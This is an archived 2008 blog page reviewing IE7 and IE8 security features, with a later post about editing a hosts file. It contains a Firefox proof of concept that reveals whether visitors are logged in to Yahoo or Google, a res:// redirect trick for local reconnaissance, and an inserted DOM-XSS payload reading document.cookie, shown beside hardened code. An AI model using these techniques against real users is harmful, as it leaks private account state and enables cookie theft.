March 17th, 2008: Security In IE7 & IE8

I had some fun today with Internet Explorer and also tested the new IE8.
Along the way I compared its new security features to IE7's, and there is a
lot to say about both versions. Don't get me started on the usability. To
be honest, it looks horrible. I don't know if you ever noticed it, but
selecting text with your mouse has become a real challenge: it has some
strange selection boundary that results in selecting text you don't want to
select. Typical Microsoft. On to the security features. You might have
heard or read about a new feature called XDR that allows cross-domain
requests. If not, I'll explain it briefly here, along with the other new
features, before I get into reverse engineering IE7 & IE8.

The XDR object.

var xdr = new XDomainRequest();
xdr.open('POST', 'http://www.mr.bigglesworth.com');
xdr.onload = function () { /* xdr.responseText is readable here only if the server opted in */ };
xdr.send(data);
IE sends the request with an XDomainRequest header, and www.mr.bigglesworth.com
has to approve it: the calling script only gets to read the response if the
server returns this header:
Response.AppendHeader("XDomainRequestAllowed", "1");
Great, XSS made easy. No need for hijacked iframes, CSS or images; pure
JavaScript does the trick for us. Two caveats before you rely on it: the
request is sent to the target whether or not the target opts in (the header
only gates whether the script can read the response), and IE attaches no
cookies or HTTP authentication to an XDR, so it cannot ride the victim's
existing session the way a script injected into the target itself can. It
can still bypass XSS filters that only look for iframe, image or stylesheet
loads, so if you run one, be sure to check this beast out. In my opinion
this will broaden the attack landscape, since there are more ways of
launching XSS or spreading worms. Besides responseText, the XDR object
exposes these events and properties:
xdr.onerror
xdr.ontimeout
xdr.onprogress
xdr.onload
xdr.timeout
Useful, if you're into worms and all.
Next, I saw that they implemented cross-document messaging in the form of
postMessage. Opera already has it, and from a security standpoint I don't
trust it. It lets one window (say a page and the iframe it embeds) send a
string to another window, even one from a different domain; the receiving
page picks it up by attaching an event listener and decides what to do with
it. Spoofing comes to mind, and maybe other attacks as well: a listener that
does not check where the message came from will act on a message from any
page that can get a reference to its window. The real question is of course:
what is it for? I don't know. Implementing it is a breeze:
page 1:
var frame = document.getElementsByTagName('iframe')[0];
frame.contentWindow.postMessage('Hello Mr. Bigglesworth!');
page 2:
document.attachEvent('onmessage', function (e) {
  // Only act on messages from the domain we expect (IE8 beta exposes e.domain)
  if (e.domain == 'example.com') {
    if (e.data == 'Hello Mr. Bigglesworth!') {
      e.source.postMessage('Meow! Meow! Dr. Evil!');
    } else {
      alert(e.data);
    }
  }
});
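A hardened receiver for the exchange above, as an added example that is not code from the original post. It normalizes IE8's e.domain and the standard e.origin to a host name, checks that host against an exact allowlist (a substring test would be bypassed by a lookalike such as example.com.evil.net), and treats e.data as a command name looked up in a table instead of handing it to alert() or eval(). The allowlist, the command names and the event objects in the test are made up for illustration; the browser wiring at the bottom is skipped when the code runs under Node.

```javascript
// Added example, not from the original post. Allowlist and commands are hypothetical.
var ALLOWED_SENDERS = ['example.com', 'www.example.com'];

// Reduce whatever the browser supplies (standard e.origin such as
// "https://example.com:443", or IE8 beta's bare e.domain "example.com") to a
// lowercase host name. An opaque origin ("null") yields null and is rejected.
function senderHost(e) {
  if (typeof e.origin === 'string' && e.origin) {
    var m = /^[a-z][a-z0-9+.-]*:\/\/([^\/:?#]+)/i.exec(e.origin);
    return m ? m[1].toLowerCase() : null;
  }
  if (typeof e.domain === 'string' && e.domain) {
    return e.domain.toLowerCase();
  }
  return null;
}

// Only these verbs are honoured; the message text is never interpreted as code.
var COMMANDS = {
  'Hello Mr. Bigglesworth!': function (e) {
    if (e.source && typeof e.source.postMessage === 'function') {
      // Reply only to the sender; pass its origin when the browser exposes one.
      e.source.postMessage('Meow! Meow! Dr. Evil!', e.origin || '*');
    }
    return 'greeted';
  },
  'ping': function () { return 'pong'; }
};

// Returns a description of what was done, so the decision can be tested.
function handleMessage(e) {
  var host = senderHost(e);
  if (host === null || ALLOWED_SENDERS.indexOf(host) === -1) {
    return 'rejected: sender ' + host;
  }
  // hasOwnProperty guard: "constructor" or "toString" must not resolve to
  // Object.prototype members.
  if (typeof e.data !== 'string' || !Object.prototype.hasOwnProperty.call(COMMANDS, e.data)) {
    return 'rejected: unknown command';
  }
  return COMMANDS[e.data](e);
}

// Browser wiring: IE8 fires onmessage on document via attachEvent, other
// browsers fire "message" on window.
if (typeof window !== 'undefined') {
  if (window.addEventListener) {
    window.addEventListener('message', handleMessage, false);
  } else if (typeof document !== 'undefined' && document.attachEvent) {
    document.attachEvent('onmessage', handleMessage);
  }
}
```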
Hash write access.
Another thing that caught my eye was write access to the hash of a URL
(location.hash). It doesn't sound smart, because I don't want JavaScript
manipulating the hash. Not only can it be annoying, it can lead to security
issues depending on how your website is built: a page that reads
location.hash and writes it into the document without encoding it turns the
fragment into an injection point, and since the fragment is never sent to
the server, no server-side filter ever sees it.
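The fragment as a DOM-based injection point, as an added example that is not part of the original post: renderUnsafe() is the vulnerable pattern (the value after "#section=" is copied into innerHTML) and renderSafe() is the hardened form, which allowlists the section names and HTML-encodes before writing. The "#section=" convention, the section names and the element stand-in are assumptions made for the example so it runs under Node; in a browser you would pass a real element and window.location.hash.

```javascript
// Added example, not from the original post. Fragment layout and section names
// are hypothetical.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// "#section=<value>" -> decoded value; null when absent or malformed.
function sectionFromHash(hash) {
  var m = /^#section=(.*)$/.exec(hash || '');
  if (!m) return null;
  try { return decodeURIComponent(m[1]); } catch (err) { return null; }
}

// Vulnerable: whatever follows "#section=" becomes markup. A link such as
// page.html#section=<img src=x onerror=...> runs script in the page's origin
// and the payload never appears in any server log.
function renderUnsafe(el, hash) {
  var s = sectionFromHash(hash);
  el.innerHTML = '<h2>' + (s === null ? 'home' : s) + '</h2>';
  return el.innerHTML;
}

// Hardened: accept only sections we actually have, and encode anyway before
// the string reaches innerHTML (IE8 has no textContent, so encoding is the
// portable choice).
var KNOWN_SECTIONS = ['home', 'features', 'security'];
function renderSafe(el, hash) {
  var s = sectionFromHash(hash);
  var key = s === null ? 'home' : s.toLowerCase();
  if (KNOWN_SECTIONS.indexOf(key) === -1) key = 'home';
  el.innerHTML = '<h2>' + escapeHtml(key) + '</h2>';
  return el.innerHTML;
}

// Stand-in for a DOM element, constructed for the example.
function fakeElement() { return { innerHTML: '' }; }

// Constructed attack fragment used by the test below.
var PAYLOAD = '#section=<img src=x onerror=alert(document.cookie)>';

// Browser wiring (skipped under Node): re-render on load and on hash changes.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  var target = document.getElementById('content');
  if (target) {
    renderSafe(target, window.location.hash);
    window.onhashchange = function () { renderSafe(target, window.location.hash); };
  }
}
```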

Webslices.

If I understand it correctly, this feature lets users favorite a slice of a
page or put it in their feed reader. Better expect some buffer overflows
here, since IE8 now looks for the 'hslice' class on any page it opens; it
would be nice to fuzz this feature.
<div class="hslice" id="main">
<h2 class="entry-title">All I want are friggin' sharks with friggin' laser
beams attached to their heads!</h2>
</div>

GlobalStorage & SessionStorage.

IE8 jumped on the Mozilla bandwagon and implemented the DOM Storage objects
(globalStorage and sessionStorage). I can't say I'm that impressed because,
as I said before, allowing 10MB of data to be stored in such an object (an
XML file in IE8) isn't smart, let alone the permanent storage of user
tracking details, XSS worms and other spyware.

IE8 GlobalStorage

<script>
// globalStorage is keyed by host name; whatever is stored here persists
// across sessions for that host.
var storage = globalStorage[location.hostname];
storage.some_string =
    'Ladies and Gentlemen welcome to my underground lair.\n' +
    'I have gathered here before me the worlds deadliest assassins.\n' +
    'And yet each of you has failed to kill Austin Powers.\n' +
    'That makes me angry. And when Dr. Evil gets angry, Mr. Bigglesworth gets upset.\n' +
    'And when Mr. Bigglesworth gets upset...people DIE!!!\n' +
    'Why must I be surrounded by freakin idiots. Mustafa, Frau Farbissina...';
</script>

Reverse Engineering IE7 & IE8.

Okay, this is fun. I'm going to show you a couple of things I found out
about Internet Explorer. First off, IE8 no longer follows a Location header
that points at a local file. A pity, because this was pretty 'evil' in MSIE
7, where it is still possible to redirect the browser to a file stored on
your own computer. It's very simple:
<?php
// "localfile" stands for the local path or res:// URL you want IE to open
header("Location: localfile");
?>
IE7 follows it, whereas IE8 refuses to.
The reason this is dangerous is that IE ships an XML resource containing
system information which we could parse. Useful for reconnaissance and
possibly other attack schemes.
<?php
header("Location: res://ieframe.dll/24/123");
?>
Results in IE7:
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
  <assemblyIdentity name="Microsoft.Windows.InetCore.ieframe" processorArchitecture="x86" version="5.1.0.0" type="win32" />
  <description>Windows IE</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
    </dependentAssembly>
  </dependency>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false" />
      </requestedPrivileges>
    </security>
  </trustInfo>
  <asmv3:application>
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
      <dpiAware>true</dpiAware>
    </asmv3:windowsSettings>
  </asmv3:application>
</assembly>
If you look closely, I read res://ieframe.dll/24/123: resource type 24 is
RT_MANIFEST, so this is the assembly manifest embedded in ieframe.dll, which
is the IEDataObjectWrapper (InProcServer32). I don't know why they still
allow this to be browsable, because you can reference it from iframes, as
XML and as a JavaScript source. So I went further and found all the data
objects in IE8 and a few in IE7.
IE7/8 data sources are:
res://ieframe.dll/MUI/1
res://ieframe.dll/TYPELIB/1
res://ieframe.dll/UIFILE/{20481,20482,20483,20484,20485,20486,20487,39216,41555}
res://ieframe.dll/WEVT_TEMPLATE/1
res://ieframe.dll/Version Info/1
res://ieframe.dll/23/ABOUT.js
res://ieframe.dll/23/ANALYZE.js
res://ieframe.dll/23/ANCHBRWS.js
res://ieframe.dll/23/DOCBROWS.js
res://ieframe.dll/23/ERROR.js
res://ieframe.dll/23/HTTPERRORPAGESSCRIPTS.js
res://ieframe.dll/23/IEERROR.js
res://ieframe.dll/23/IMGBROWS.js
res://ieframe.dll/23/INVALIDCERT.js
res://ieframe.dll/23/ORGFAV.js
res://ieframe.dll/23/PHISHSITE.js
res://ieframe.dll/23/POLICY.js
res://ieframe.dll/23/PREVIEW.js
res://ieframe.dll/preview.dlg (dialog)
res://ieframe.dll/23/PSTEMPLATES.js
res://ieframe.dll/24/123 (XML file)
IE6 has a few too:
res://mshtml.dll/REGINST/REGINST
res://mshtml.dll/23/ABOUT.MOZ
res://mshtml.dll/23/BLANK.HTM
res://mshtml.dll/23/REPOST.HTM
As well as others.
These are nice to play with some more; I haven't dug any deeper yet, but
this is quite nice to have a look at. So, enough building blocks to pentest
IE a little further. If you find anything notable, do let me know.

A small piece of code I wrote a while ago; sharing it here, and as a note to myself.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>DOM attributes enumeration POC</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!--
// List every attribute node the browser exposes on the input element as a
// link; clicking a link shows that attribute's current value.
function load_attributes()
{
    var attrs = document.getElementById("text_id").attributes;
    var div = document.getElementById("attrs_div");
    // Iterate by index: a for-in loop over the collection would also yield
    // "length" and its methods, not just attribute nodes.
    for (var i = 0; i < attrs.length; i++) {
        var name = attrs[i].name;
        div.innerHTML += "<li><a href='javascript:load_attrib_value(\"" + name + "\")'>" + name + "</a></li>";
    }
}
function load_attrib_value(attrib)
{
    var attrs = document.getElementById("text_id").attributes;
    var namedItem = attrs.getNamedItem(attrib);
    if (namedItem)
        alert(attrib + " = " + namedItem.value);
    else
        alert(attrib + " is not specified!");
}
//-->
</SCRIPT>
</HEAD>

<BODY onload="load_attributes()">
<input id="text_id" type="text" value="text_value" name="text_box">
<p>
Text has the following attributes:
<div id="attrs_div">
</div>
</BODY>
</HTML>

Today I read an interesting article about using JavaScript to detect whether a user is logged in to certain web applications. The original article didn't give concrete implementation code, but after some research I tried writing a POC; in testing it only works in Firefox. IE's error message interface is different from Firefox's, and I haven't yet found a way to exploit it there.

The test page is here.

The POC source code is attached:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta name="refer" content="http://kentbrewster.com/patching-privacy-leaks/">
<title>JavaScript WebSite Login Checker</title>
</head>

<body>
<script>
// Hook Firefox's window.onerror. Loading a cross-site HTML page as a script
// fails with a syntax error whose message and line number depend on the HTML
// that came back, and that HTML differs between the logged-in and logged-out
// versions of the page.
window.onerror = err;

// Error signatures observed for each site, keyed by the URL that is loaded.
// An object is used rather than an Array because the keys are URLs.
var sites = {};
sites['http://mail.yahoo.com/'] = {
    name: 'Yahoo Mail (Beta)',
    login_msg: 'missing } in XML expression',
    login_line: '12',
    logout_msg: 'syntax error',
    logout_line: '8'
};
sites['https://www.google.com/accounts/ManageAccount'] = {
    name: 'Google Account',
    login_msg: 'XML tag name mismatch (expected a)',
    login_line: '144',
    logout_msg: 'missing = in XML attribute',
    logout_line: '35'
};

// Load the target URL as a script. The browser attaches the user's cookies,
// so the response is whatever page the user would see when logged in or out.
function check(loc) {
    var script = document.createElement('script');
    script.setAttribute('src', loc);
    script.setAttribute('type', 'text/javascript');
    var head = document.getElementsByTagName('head')[0];
    head.appendChild(script);
}

// Firefox passes (message, script URL, line number) to onerror.
function err(msg, loc, line) {
    var site = sites[loc];
    if (!site) return;                       // error from some other script
    var res = document.getElementById(site.name);
    if (msg == site.login_msg && line == site.login_line) {
        res.innerHTML = ' Logged-in';
    } else if (msg == site.logout_msg && line == site.logout_line) {
        res.innerHTML = ' Not Logged-in';
    } else {
        // Neither signature matched: the site's HTML probably changed.
        res.innerHTML = ' Unknown';
    }
    window.stop();
}

function addSite(loc)
{
    var results = document.getElementById('results');
    var subdiv = document.createElement('div');
    results.appendChild(subdiv);
    var name = document.createElement('span');
    name.innerHTML = sites[loc].name;
    subdiv.appendChild(name);

    var result = document.createElement('span');
    result.setAttribute('id', sites[loc].name);
    result.innerHTML = ' ';
    subdiv.appendChild(result);
    var button = document.createElement('input');
    button.type = 'button';
    button.value = 'check';
    button.onclick = function () { check(loc); };
    subdiv.appendChild(button);
}
</script>
<div align="center">
<h1>JavaScript WebSite Login Checker</h1>

<div id="results"></div>
<script>
for (var i in sites) {
    addSite(i);
}
</script>
</div>
</body>
</html>

March 3rd, 2008: First WordPress post!

I haven't updated my blog for over a month, and I found that the 水木 blog system has also started using WordPress~

Right after switching I found that the stylesheet in one of my old posts had "polluted" the stylesheet namespace of WordPress's default theme,

and the whole blog front page was a horrible sight...

I looked around, deleted the offending post, and it was finally fine.

What I want to write about next is still a 水木 problem~~

For a while now I haven't been able to view images or any attachments on 水木, and every board is the same. At first I thought it was a browser problem, but neither IE 6, IE 7 nor FF 2.0 worked. What's going on?

With no other option I looked at the attachment link address: oh, att.newsmth.net

Tried pinging it, and the domain name could not be resolved!

So that's it: it looks like the school's DNS server is at fault, not 水木.

Fix it myself, using an online network tool that I used a lot while doing pentests a while back, a veritable Swiss army knife for information gathering: http://www.robtex.com/

Submit a query for att.newsmth.net

The resolution result returned is as follows:

att.newsmth.net CNAME att.k.newsmth.net 60.2.251.13

Good, with the IP it's easy.

Edit the hosts file under C:\WINDOWS\system32\drivers\etc\ and add the following records to it:

60.2.251.13 att.newsmth.net
60.2.251.13 newsmth.net
60.2.251.13 trojanjason.mysmth.net

After saving, ping again, and sure enough it's OK; the domain name resolves!

Hoho, I can view images again, haha

B.t.w.: while I was writing this post FF actually crashed; luckily WordPress has an autosave feature (much better than the old 水木 blog system in that respect), otherwise all my work would have been lost.

OK, that's it for now; I'll dig into WordPress's powerful features bit by bit later!


© 2007 猪在笑 | iKon WordPress Theme by TextNData | Powered by WordPress